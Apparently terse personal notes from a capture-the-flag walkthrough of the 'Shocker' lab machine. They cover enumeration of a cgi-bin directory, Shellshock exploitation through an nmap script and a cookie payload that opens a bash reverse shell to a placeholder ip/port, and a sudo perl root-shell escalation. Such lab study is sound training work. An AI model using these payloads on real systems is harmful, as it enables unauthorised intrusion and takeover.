shocker
Last updated
Was this helpful?
Last updated
Was this helpful?
apache header tells ubuntu version ssh version tells ubuntu version
Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 16.04.
open in browser ; view page source gobuster does not reveals sesnitive dir because it does not dirb and dirsearch automatically addess a slash for directories in the wordlist but it doubles the no. of attempts . so dirb will find it in first go. if want to run gobuster add -f flag to look for directories i.e simply addessa a slash in wordlist
will get a cgi-bin directory
what is CGI ? let's configure our own cgi on apache server how to enable disable cgi for apache write your own cgi script configure cgi
Learning Apache http server - Executing CGI scripts - YouTube
Lecture -19 CGI Scripts - YouTube
Common gateway interface|CGI bin - YouTube
Common Gateway Interface(CGI) || working process of Common Gateway Interface - YouTube
Create first cgi script - YouTube
How To Enable or Disable CGI Scripts in Apache - YouTube
run recurse inside this directory looking for command cgi scripts
it defines how info / comm takes place btwn browser n server
creating pages dynamically noyh
shellshock is a bug in bash old version of bash precisely Shellshock Code & the Bash Bug - Computerphile
└─$ gobuster dir -o gobust-cgi.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -x sh,pl,cgi
nmap -p80 --scipt http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=echo\;/bin/ls
reverse shell bash one liner rev shell cookie: () { :;}; echo; /bin/bash -i >&& /dev/tcp/ip/port 0>&1
priv esc sudo /usr/bin/perl -e 'exec("/bin/bash")'